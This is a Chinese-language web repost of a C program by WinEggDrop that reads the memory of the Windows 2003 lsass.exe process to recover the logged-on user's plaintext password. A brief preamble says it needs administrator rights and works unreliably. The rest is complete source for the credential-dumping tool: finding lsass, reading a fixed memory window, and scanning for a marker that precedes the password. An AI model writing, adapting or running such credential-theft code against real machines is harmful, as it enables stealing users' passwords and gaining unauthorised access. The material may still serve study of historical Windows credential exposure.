XP 和 2003 的 Lsass 进程中明文密码

XP 和2003的Lsass进程中明文密码 发布于:软件开发网 来源:互联网 作者:佚名 时间:2009-02-26 00:00


用 WinHex 读取 XP 和 2003 下 Lsass 进程的内存数据，可以读取当前登录用户的明文密码。需要说明的是：读取 lsass.exe 的内存要求能以 PROCESS_VM_READ 打开该进程（通常需要管理员权限）；下面的程序通过 Is2003() 只允许在 Windows 2003（版本 5.2）上运行，并且依赖硬编码的基址 0x002b5000 和 "LocalSystem\0Remote\0Procedure\0Call" 特征串来定位密码，作者自己也注明结果并不可靠（"We only look for luck"）。

sourcecode:

//********************************************************************************
//Version:V1.0
//Coder:WinEggDrop
//DateRelease:12/15/2004
//Purpose:      To demonstrate searching for the logon user's password on a 2003 box. The method
//              used is pretty unwise, but this may be the only way to review the
//              logon user's password on Windows 2003.
//TestPlatForm:Windows2003
//CompiledOn:VC 6.0
//********************************************************************************
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Base address inside lsass.exe from which memory is read. The password may sit
 * before this address or far beyond it, which is what makes the result unreliable
 * (the author's own caveat). */
#define BaseAddress 0x002b5000

/* Receives the password string recovered by Search(); zero-filled at startup. */
char Password[MAX_PATH] = {0};

/* Function prototypes */
/* ------------------------------------------------------------------------------------ */
BOOL  FindPassword(DWORD PID);
int   Search(char *Buffer, const UINT nSize);
DWORD GetLsassPID();
BOOL  Is2003();
/* ------------------------------------------------------------------------------------ */
/* End of function prototypes */

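/* Entry point: refuse to run on anything but Windows 2003, locate lsass.exe and
 * scan a fixed window of its memory for the logon password.
 * Returns 0 when the scan completed (password found or not) and -1 when a
 * precondition failed (wrong OS, lsass.exe not found, process not readable). */
int main()
{
    DWORD PID = 0;
    printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

    /* Is2003() accepts version 5.2 only: the hard-coded BaseAddress and the magic
     * string used by Search() are not meaningful on any other platform. */
    if (!Is2003())
    {
        printf("The program can only run on the Windows 2003 platform\n");
        return -1;
    }

    PID = GetLsassPID();  /* 0 means the snapshot failed or no lsass.exe was listed */
    if (PID == 0)
    {
        printf("Fail To Locate Lsass.exe\n");
        return -1;
    }

    /* FindPassword() reports its own open/read failures; surface them in the exit code. */
    if (!FindPassword(PID))
    {
        return -1;
    }
    return 0;
}
//End main()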

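//------------------------------------------------------------------------------------
//Purpose:     Scan a memory buffer read from lsass.exe and try to extract the password
//Return Type: int - index just past the 7-byte marker where the password starts,
//             or -1 if the magic string or the marker was not found (the usual case)
//Parameters:
//  In:  char *Buffer     --> the memory buffer to search
//  In:  const UINT nSize --> number of valid bytes in Buffer
//Side effect: the global Password[] is cleared and, on success, filled with the
//             narrow-ASCII form of the UTF-16LE string that follows the marker.
//Note:        The program tries to locate the magic string "LocalSystem Remote Procedure
//             Call". Its words are separated by NUL bytes rather than spaces, so strstr()
//             cannot find the sequence and it is matched token by token. The password is
//             assumed to be near that location, but finding the string is not guaranteed
//             and, even when it is found, the password may live somewhere else - in the
//             author's words, "we only look for luck".
//             Every access is bounds-checked against nSize: the original code could read
//             past the buffer while matching tokens or the 0x02 marker, and could
//             overflow Password[] when a long non-NUL run followed the marker.
//------------------------------------------------------------------------------------

/* Case-insensitive match of the NUL-terminated token `tok` at Buffer[pos], refusing to
 * read at or beyond nSize. Returns 1 on match, 0 otherwise. */
static int MatchToken(const char *Buffer, UINT nSize, UINT pos, const char *tok)
{
    UINT len = (UINT)strlen(tok);
    UINT k;

    if (pos > nSize || nSize - pos < len)
    {
        return 0;
    }
    for (k = 0; k < len; k++)
    {
        if (tolower((unsigned char)Buffer[pos + k]) != tolower((unsigned char)tok[k]))
        {
            return 0;
        }
    }
    return 1;
}

int Search(char *Buffer, const UINT nSize)
{
    static const char *const Tokens[] = { "LocalSystem", "Remote", "Procedure", "Call" };
    UINT i = 0;
    UINT j = 0;
    UINT Count = 0;

    if (Buffer == NULL)
    {
        return -1;
    }

    /* Locate the magic string: each of the first three tokens is followed by one NUL. */
    for (i = 0; i < nSize; i++)
    {
        UINT OffSet = 0;
        int  t;

        if (Buffer[i] != 'L')
        {
            continue;
        }
        for (t = 0; t < 4; t++)
        {
            if (!MatchToken(Buffer, nSize, i + OffSet, Tokens[t]))
            {
                break;
            }
            if (t < 3)
            {
                OffSet += (UINT)strlen(Tokens[t]) + 1;
            }
        }
        if (t == 4)
        {
            i += OffSet;  /* resume the marker scan at "Call", as the original did */
            break;
        }
    }

    if (i >= nSize)
    {
        return -1;
    }

    ZeroMemory(Password, sizeof(Password));

    /* The password is expected right after the byte 0x02 followed by six zero bytes. */
    for (; i + 6 < nSize; i++)
    {
        if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 &&
            Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 &&
            Buffer[i + 6] == 0)
        {
            /* The string is UTF-16LE: take the low byte of every code unit, stop at the
             * first NUL or non-ASCII byte, and always leave room for the terminator. */
            for (j = i + 7; j < nSize && Count < sizeof(Password) - 1; j += 2)
            {
                if (Buffer[j] > 0)
                {
                    Password[Count++] = Buffer[j];
                }
                else
                {
                    break;
                }
            }
            return (int)(i + 7);  /* flag: we found the marker (the password may still be empty) */
        }
    }
    return -1;  /* we failed to find the password, and this always happens */
}
//End Search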

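//------------------------------------------------------------------------------------
//Purpose:     Find the process ID of lsass.exe with a Toolhelp process snapshot
//Return Type: DWORD - the PID, or 0 if the snapshot failed or no lsass.exe was listed
//Parameters:  None
//Note:        The match is by image name only, case-insensitive. Holding the PID does
//             not grant access; FindPassword() still has to open the process.
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
    HANDLE         hProcessSnap;
    PROCESSENTRY32 pe32;
    DWORD          PID = 0;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        printf("Fail To Create SnapShot\n");
        return 0;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32);  /* must be set before Process32First */

    if (!Process32First(hProcessSnap, &pe32))
    {
        printf("Fail To Enumerate Processes\n");
        CloseHandle(hProcessSnap);  /* must clean up the snapshot object! */
        return 0;
    }

    do
    {
        if (strcmpi(pe32.szExeFile, "Lsass.EXE") == 0)
        {
            PID = pe32.th32ProcessID;
            break;
        }
    } while (Process32Next(hProcessSnap, &pe32));

    CloseHandle(hProcessSnap);
    return PID;
}
//End GetLsassPID()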

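//------------------------------------------------------------------------------------
//Purpose:     Read a fixed window of lsass.exe memory and hand it to Search()
//Return Type: BOOL - FALSE if the process could not be opened or read, TRUE otherwise
//             (TRUE does not mean a password was found; that is printed separately)
//Parameters:
//  In:  DWORD PID -> the lsass.exe PID
//Note:        Opening lsass.exe with PROCESS_VM_READ requires sufficient rights on the
//             target; a failure here is reported as "Fail To Open Process".
//------------------------------------------------------------------------------------

/* Overwrite n bytes through a volatile pointer so the compiler cannot drop the store. */
static void Scrub(volatile char *p, size_t n)
{
    while (n--)
    {
        *p++ = 0;
    }
}

BOOL FindPassword(DWORD PID)
{
    HANDLE hProcess = NULL;
    char   Buffer[5 * 1024] = {0};
    DWORD  ByteGet = 0;
    int    Found = -1;

    hProcess = OpenProcess(PROCESS_VM_READ, FALSE, PID);
    if (hProcess == NULL)
    {
        printf("Fail To Open Process\n");
        return FALSE;
    }

    /* Read from the hard-coded BaseAddress; ByteGet is what was actually copied. */
    if (!ReadProcessMemory(hProcess, (PVOID)BaseAddress, Buffer, sizeof(Buffer), &ByteGet))
    {
        printf("Fail To Read Memory\n");
        CloseHandle(hProcess);
        return FALSE;
    }

    CloseHandle(hProcess);

    Found = Search(Buffer, (UINT)ByteGet);  /* fills the global Password[] on success */
    if (Found >= 0)
    {
        /* We found the marker; we still do not know whether the string is the real password. */
        if (strlen(Password) > 0)
        {
            printf("Found Password At #0x%x -> \"%s\"\n", (unsigned)(BaseAddress + Found), Password);
        }
        else
        {
            printf("Found The Marker But No Password Followed It\n");
        }
    }
    else
    {
        printf("Fail To Find The Password\n");
    }

    /* Buffer holds a copy of lsass memory and Password[] the recovered secret; scrub both
     * once printed so they do not linger on the stack or in the process image. */
    Scrub(Buffer, sizeof(Buffer));
    Scrub(Password, sizeof(Password));
    return TRUE;
}
//End FindPassword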

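//------------------------------------------------------------------------------------
//Purpose:     Check whether the box is Windows 2003 (version 5.2)
//Return Type: BOOL - TRUE only if GetVersionEx succeeded and reports 5.2
//Parameters:  None
//Note:        GetVersionEx is first asked with the OSVERSIONINFOEX size; systems that
//             reject it are retried with the base OSVERSIONINFO size. The original
//             shrank the size on failure but never called again, so a failed first
//             call left a zeroed structure and made every system look like "not 2003".
//------------------------------------------------------------------------------------
BOOL Is2003()
{
    OSVERSIONINFOEX osvi;

    ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX));
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);

    if (!GetVersionEx((OSVERSIONINFO *)&osvi))
    {
        osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
        if (!GetVersionEx((OSVERSIONINFO *)&osvi))
        {
            return FALSE;  /* no version data at all; do not pretend it is 2003 */
        }
    }

    /* Windows Server 2003 reports major 5, minor 2. */
    return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
//End Is2003()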
//EndOfFile